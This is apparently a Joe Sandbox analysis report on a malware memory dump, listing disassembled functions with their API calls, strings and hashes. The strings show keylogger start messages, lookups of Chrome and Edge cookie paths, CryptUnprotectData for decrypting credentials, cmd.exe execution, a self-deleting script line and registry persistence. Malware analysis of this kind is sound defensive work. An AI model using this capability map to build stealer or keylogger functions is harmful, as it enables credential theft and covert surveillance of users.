                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                      • String ID:
                                      • API String ID: 1356121797-0
                                      • Opcode ID: 8a986032c4012f4cd3acc496e3b63c3d5e6e1ae1f11a6337e18d2f9f59bc8e24
                                      • Instruction ID: ef93ec0c7b46db6bf4a7c23be89592f3d11f62624edc1e01f9d15ca27d951bca
                                      • Opcode Fuzzy Hash: 8a986032c4012f4cd3acc496e3b63c3d5e6e1ae1f11a6337e18d2f9f59bc8e24
                                      • Instruction Fuzzy Hash: AB21AE71E942009FF739DF29E815A1A7BB6FB84380B00086AE929C77E0DB300468CF54
                                      Function 02B4F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 02B4F363
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02B4F386
                                        • Part of subcall function 02B46137: RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02B4F3AC
                                      • _free.LIBCMT ref: 02B4F3BF
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 02B4F3CE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 83729ef995c7fc9e61c9206f97fb357e66bf8c212b325022cc05521d0b9ad0db
                                      • Instruction ID: 58238e8c1d5ed9bb068028e22a0b7807455d573ab74ccbedf9510e068ad488b1
                                      • Opcode Fuzzy Hash: 83729ef995c7fc9e61c9206f97fb357e66bf8c212b325022cc05521d0b9ad0db
                                      • Instruction Fuzzy Hash: F201B173A01764BB27211ABA5CCCC7B6A6DDBC6EEC31541A9FD14C7600DF688D01A5B0
                                      Function 02B1C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02B66468,00000000,00000000,02B0D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 02B1C430
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02B1C44D
                                      • CloseHandle.KERNEL32(00000000), ref: 02B1C459
                                      • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02B1C46A
                                      • CloseHandle.KERNEL32(00000000), ref: 02B1C477
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreatePointerWrite
                                      • String ID:
                                      • API String ID: 1852769593-0
                                      • Opcode ID: a1a18348432b3f21af4ee1bab451b3db3425554c02deb8a782e32afc0274cf4f
                                      • Instruction ID: 15df232335d6c47dab9c19bafecc971d1ed30e8ced5d548fd80ad1e684e1c839
                                      • Opcode Fuzzy Hash: a1a18348432b3f21af4ee1bab451b3db3425554c02deb8a782e32afc0274cf4f
                                      • Instruction Fuzzy Hash: F3110C71288220FFE6104F24AC8BF7B7B9CEB422B4F54866AF191C71C0C7219C008672
                                      Function 02B11163 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02B11170
                                      • int.LIBCPMT ref: 02B11183
                                        • Part of subcall function 02B0E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 02B0E0D2
                                        • Part of subcall function 02B0E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 02B0E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 02B111C3
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02B111CC
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B111EA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                      • String ID:
                                      • API String ID: 2536120697-0
                                      • Opcode ID: 1af5817db4193174c64a48c32024e8de0391fc889f98f8bd8e4473fef0682c5d
                                      • Instruction ID: 81d0a92d16d420989e420aeff4d7fd5b32dd973e416c57500d70e3dd34bb2569
                                      • Opcode Fuzzy Hash: 1af5817db4193174c64a48c32024e8de0391fc889f98f8bd8e4473fef0682c5d
                                      • Instruction Fuzzy Hash: 9611CA72A10118ABCB15FBA9D84499EBB7ADF44350B5045DAE905A72D0EB309E50CFD0
                                      Function 02B48299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,00000000,02B3BC87,00000000,00000000,?,02B3BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02B4829E
                                      • _free.LIBCMT ref: 02B482D3
                                      • _free.LIBCMT ref: 02B482FA
                                      • SetLastError.KERNEL32(00000000,?,02B05103), ref: 02B48307
                                      • SetLastError.KERNEL32(00000000,?,02B05103), ref: 02B48310
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 90291c4910e848b3c4149f423cbb6ab4715040e752263165d57c146b923b5e55
                                      • Instruction ID: 0dc0c9d274702476edbf429826687adb4d5defba68df5a57eabd12c936367607
                                      • Opcode Fuzzy Hash: 90291c4910e848b3c4149f423cbb6ab4715040e752263165d57c146b923b5e55
                                      • Instruction Fuzzy Hash: 6801F43A940B006BD71226296CC4F6B365FEBC37B972449A9FC65E7290EF648C05B5A0
                                      Function 02B509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 02B509D4
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • _free.LIBCMT ref: 02B509E6
                                      • _free.LIBCMT ref: 02B509F8
                                      • _free.LIBCMT ref: 02B50A0A
                                      • _free.LIBCMT ref: 02B50A1C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 7f44122e4ae786988ef704bb8a4091e1ad5d1e17cfc2cd5d81f2f063caefb45e
                                      • Instruction ID: df8af20543ee01d44102b38bccddeb8753f4a04595326fd60823979bd8ffbb75
                                      • Opcode Fuzzy Hash: 7f44122e4ae786988ef704bb8a4091e1ad5d1e17cfc2cd5d81f2f063caefb45e
                                      • Instruction Fuzzy Hash: 16F01232954214B7CA21FE5CE4C1D1A73EEEB197557548D89F969EF900CB30FCD08AA4
                                      Function 02B44048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 02B44066
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • _free.LIBCMT ref: 02B44078
                                      • _free.LIBCMT ref: 02B4408B
                                      • _free.LIBCMT ref: 02B4409C
                                      • _free.LIBCMT ref: 02B440AD
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: d6fe07e6d4e8c493b209f7d39c5688a10503188b591e39ca5b88aa2482f277cf
                                      • Instruction ID: 9ccb6eee241f516f1e8f93675da4e138221b4e644fc85622033e8215f67eed6a
                                      • Opcode Fuzzy Hash: d6fe07e6d4e8c493b209f7d39c5688a10503188b591e39ca5b88aa2482f277cf
                                      • Instruction Fuzzy Hash: DEF03071C911108FEE22AF2CB8808053776E7057E17444986FD3463660CB314E7AEFD2
                                      Function 02B13A55 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02B13ABC
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 02B13AEB
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 02B13B8B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Enum$InfoQueryValue
                                      • String ID: [regsplt]
                                      • API String ID: 3554306468-4262303796
                                      • Opcode ID: 15832d7465a881b7fc9a8d96e9c9c79789702a013fd6ae619e6d3b886397c565
                                      • Instruction ID: 88295f7ef79f7f162b89cea87151fb2df44e12147fd1b3d035ed19528f197758
                                      • Opcode Fuzzy Hash: 15832d7465a881b7fc9a8d96e9c9c79789702a013fd6ae619e6d3b886397c565
                                      • Instruction Fuzzy Hash: B2511171910219AADB15EB94DC85EEFBBBEEF04304F5004E5E505E6190EF706A48CFA0
                                      Function 02B0C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B0C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02B0C559
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 02B0C6EC
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02B0C757
                                      Strings
                                      • User Data\Default\Network\Cookies, xrefs: 02B0C6D2
                                      • User Data\Profile ?\Network\Cookies, xrefs: 02B0C704
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      • Opcode ID: 1aafb80f2b202180f16be079c153bd131cb37e90e85e45f27dbf052817847943
                                      • Instruction ID: 09f5c6ebf0364ed33ed506bfdd919900153bc3a6654df234c4f77afc90478130
                                      • Opcode Fuzzy Hash: 1aafb80f2b202180f16be079c153bd131cb37e90e85e45f27dbf052817847943
                                      • Instruction Fuzzy Hash: 93212431D101199ACB0AFBA5DCD5DEEBF7EEF50715B40019AE606930D0EF609A4ACAD0
                                      Function 02B0C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B0C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02B0C4F6
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 02B0C61D
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 02B0C688
                                      Strings
                                      • User Data\Default\Network\Cookies, xrefs: 02B0C603
                                      • User Data\Profile ?\Network\Cookies, xrefs: 02B0C635
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      • Opcode ID: c72f1e08c01a4e39319ecce1fc1628a4ac2ecf6ab18c66a66b7187850055c4af
                                      • Instruction ID: 858fc6c7913a7ba7ff3b5b8a182c47d23134df41220eaff02234e99d81cb72e5
                                      • Opcode Fuzzy Hash: c72f1e08c01a4e39319ecce1fc1628a4ac2ecf6ab18c66a66b7187850055c4af
                                      • Instruction Fuzzy Hash: 06211231D1011996CB1AFBA5DCD5CEEBF3EFF50715B40019AE506930D0EF609A4ACA90
                                      Function 02B0A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,02B0A27D,?,00000000,00000000), ref: 02B0A1FE
                                      • CreateThread.KERNEL32(00000000,00000000,02B0A267,?,00000000,00000000), ref: 02B0A20E
                                      • CreateThread.KERNEL32(00000000,00000000,02B0A289,?,00000000,00000000), ref: 02B0A21A
                                        • Part of subcall function 02B0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02B0B172
                                        • Part of subcall function 02B0B164: wsprintfW.USER32 ref: 02B0B1F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTimewsprintf
                                      • String ID: Offline Keylogger Started
                                      • API String ID: 465354869-4114347211
                                      • Opcode ID: 505e11a4a4ec2a570f04a37f40e64941fd91fbf8271b58a86da98aa37bc47d33
                                      • Instruction ID: a495d58ccc43779d8c4f4e8cdebfba74cb5487023c0b83ee5602c1936d8234c4
                                      • Opcode Fuzzy Hash: 505e11a4a4ec2a570f04a37f40e64941fd91fbf8271b58a86da98aa37bc47d33
                                      • Instruction Fuzzy Hash: 6411AB611003087EA221B7359CC6CBF7F5EDF41298B4009ADF987021D5EE515D54CEF2
                                      Function 02B0AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02B0B172
                                        • Part of subcall function 02B0B164: wsprintfW.USER32 ref: 02B0B1F3
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 02B0AF6E
                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 02B0AF7A
                                      • CreateThread.KERNEL32(00000000,00000000,02B0A295,?,00000000,00000000), ref: 02B0AF86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTime$wsprintf
                                      • String ID: Online Keylogger Started
                                      • API String ID: 112202259-1258561607
                                      • Opcode ID: ce2a43dc9d2315c69f73e09f5ee3195d3bb91257f133de1c8cfae1873b5bc490
                                      • Instruction ID: 4fccc36af936b61ffe29bfc645c009acf13a0d9696392bd69ee7896db28b3234
                                      • Opcode Fuzzy Hash: ce2a43dc9d2315c69f73e09f5ee3195d3bb91257f133de1c8cfae1873b5bc490
                                      • Instruction Fuzzy Hash: E901C8917003183DF62276354CCAD7F7F5ECB81298F4005E8FA8616185DD551C498BF2
                                      Function 02B06A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 02B06A82
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B06A89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: CryptUnprotectData$crypt32
                                      • API String ID: 2574300362-2380590389
                                      • Opcode ID: ea7fd6cd8255a3df51d98bf7343f1a80b1441dcef640f7b7f40fc9d94e3008d2
                                      • Instruction ID: 5d8dc5bb897d72a9e15acfda766ca6fc13acc1e812118dda0b68b5720470ac3e
                                      • Opcode Fuzzy Hash: ea7fd6cd8255a3df51d98bf7343f1a80b1441dcef640f7b7f40fc9d94e3008d2
                                      • Instruction Fuzzy Hash: 08012831A00216ABDB19DFAEC884DBEBFBCEF48240F0441ADE965D3240D775D950C7A0
                                      Function 02B0515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,02B05159), ref: 02B05173
                                      • CloseHandle.KERNEL32(?), ref: 02B051CA
                                      • SetEvent.KERNEL32(?), ref: 02B051D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandleObjectSingleWait
                                      • String ID: Connection Timeout
                                      • API String ID: 2055531096-499159329
                                      • Opcode ID: 903248da07afebeb851eff79258e9030475a4ff215d8f5110c31bb79bf590df8
                                      • Instruction ID: 4afac93c120ec4639bc61ae7367ec072119370c33c7e7b2a3e33f17bda3781af
                                      • Opcode Fuzzy Hash: 903248da07afebeb851eff79258e9030475a4ff215d8f5110c31bb79bf590df8
                                      • Instruction Fuzzy Hash: 2C01D431A40F40AFE7377B3688D542ABFE5FF0474178409ADD58387AA0DB619850CF51
                                      Function 02B0E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B0E833
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2005118841-1866435925
                                      • Opcode ID: 0b686e1d379793d4fe89a71e16153512cb850327182734affd92f1935628a34c
                                      • Instruction ID: b736ebd835e6e0cb255ed4381c20fb6dddf789f48a4140d28db27c2c401e3f01
                                      • Opcode Fuzzy Hash: 0b686e1d379793d4fe89a71e16153512cb850327182734affd92f1935628a34c
                                      • Instruction Fuzzy Hash: 4D01A2715803086BF71AEA90C8C6FBE7F699B10705F048CD9BA16590C1EA65F641CA66
                                      Function 02B07260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                      Download Yara Rule
                                      Strings
                                      • C:\Windows\SysWOW64\rundll32.exe, xrefs: 02B076C4
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: C:\Windows\SysWOW64\rundll32.exe
                                      • API String ID: 0-2837366778
                                      • Opcode ID: 1b64943a36d82ee9a07af7c0795cfde4ed4a369df28c1214cfad6e66c9f1b897
                                      • Instruction ID: 8ecf39b08b95a5d3329172af67ac576f4c7b9d51aa6a8e2f301f8c03e1a541bb
                                      • Opcode Fuzzy Hash: 1b64943a36d82ee9a07af7c0795cfde4ed4a369df28c1214cfad6e66c9f1b897
                                      • Instruction Fuzzy Hash: 81F0F071EA0210DBCE1A67A85858739BE4AE7413C2F8008E5E943CB2C0EF205815EB60
                                      Function 02B13814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyW.ADVAPI32(80000001,00000000,02B752D8), ref: 02B1381F
                                      • RegSetValueExW.ADVAPI32(02B752D8,?,00000000,00000001,00000000,00000000,02B752F0,?,02B0F823,pth_unenc,02B752D8), ref: 02B1384D
                                      • RegCloseKey.ADVAPI32(02B752D8,?,02B0F823,pth_unenc,02B752D8), ref: 02B13858
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: pth_unenc
                                      • API String ID: 1818849710-4028850238
                                      • Opcode ID: 26ab03579e3cd5856412a96151d07dc84e28b466cce2ce7197381e7cf87dd5bf
                                      • Instruction ID: eeb6599991e3a0d481b70b7ba13be94444b1072706c19d6e3530964e26078b99
                                      • Opcode Fuzzy Hash: 26ab03579e3cd5856412a96151d07dc84e28b466cce2ce7197381e7cf87dd5bf
                                      • Instruction Fuzzy Hash: 5CF0C271840228FBDF119FA5EC45FEE3B6CEF00790F104995F9099B040E7319A14CB90
                                      Function 02B0DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02B0DFB1
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 02B0DFF0
                                        • Part of subcall function 02B35640: _Yarn.LIBCPMT ref: 02B3565F
                                        • Part of subcall function 02B35640: _Yarn.LIBCPMT ref: 02B35683
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B0E016
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                      • String ID: bad locale name
                                      • API String ID: 3628047217-1405518554
                                      • Opcode ID: 67f15d39a0b2641ca38e3562c9b28b2c6d0ce2efad2c1d373e49d69abb95019b
                                      • Instruction ID: 26901f332238261e1afb1419d28a202573b54e9fd41e0cdcc43f58325be4f730
                                      • Opcode Fuzzy Hash: 67f15d39a0b2641ca38e3562c9b28b2c6d0ce2efad2c1d373e49d69abb95019b
                                      • Instruction Fuzzy Hash: C7F0C8316006049AC736FB60DCA5FEABB699F10710F504AEDA946128D0EF78B608CE84
                                      Function 02B160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 02B16130
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell
                                      • String ID: /C $cmd.exe$open
                                      • API String ID: 587946157-3896048727
                                      • Opcode ID: 2fdc588f7d175dcb5ac513f2ff06516e89d4f966ef27f13ee2ca20ff3c8f9a9b
                                      • Instruction ID: 21c60def6ef6e95f9af46c830ed87bb673a981578d538a7ab36ab4bd6b2dcc36
                                      • Opcode Fuzzy Hash: 2fdc588f7d175dcb5ac513f2ff06516e89d4f966ef27f13ee2ca20ff3c8f9a9b
                                      • Instruction Fuzzy Hash: DEE030B16183046BD60AE668C8D8C7F7BAEAB50344B40489D7147920E0EF689D48CA50
                                      Function 02B0B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • TerminateThread.KERNEL32(02B0A27D,00000000,02B752F0,pth_unenc,02B0D0B8,02B752D8,02B752F0,?,pth_unenc), ref: 02B0B8BB
                                      • UnhookWindowsHookEx.USER32(02B750F0), ref: 02B0B8C7
                                      • TerminateThread.KERNEL32(02B0A267,00000000,?,pth_unenc), ref: 02B0B8D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: TerminateThread$HookUnhookWindows
                                      • String ID: pth_unenc
                                      • API String ID: 3123878439-4028850238
                                      • Opcode ID: cbea8adc453f256856d58f20c53423c38ae86ac63c430c76029deefc0e44a18c
                                      • Instruction ID: 82db00f7f139dcc495d85a4d9fb755326a3f636756e825dcf56454f7cb2c572e
                                      • Opcode Fuzzy Hash: cbea8adc453f256856d58f20c53423c38ae86ac63c430c76029deefc0e44a18c
                                      • Instruction Fuzzy Hash: 58E0EC71645766EFE7251F9098D88257FAADB086C93104C7DF2C3475B0CA721C10CB94
                                      Function 02B014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 02B014B9
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B014C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetLastInputInfo$User32.dll
                                      • API String ID: 2574300362-1519888992
                                      • Opcode ID: 9c365bdac0ca74a14a43af471226e8a464c8d79358032fd910a6dc563420294b
                                      • Instruction ID: e2bdc5a19c59fe04b7fbedc3dca5bfab2073fabe38a97b7c6194d566f2299988
                                      • Opcode Fuzzy Hash: 9c365bdac0ca74a14a43af471226e8a464c8d79358032fd910a6dc563420294b
                                      • Instruction Fuzzy Hash: 94B09B71DC1710D7EB105F64540DA293F546714742300484BB982D7110C77520108F91
                                      Function 02B0140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 02B01414
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B0141B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
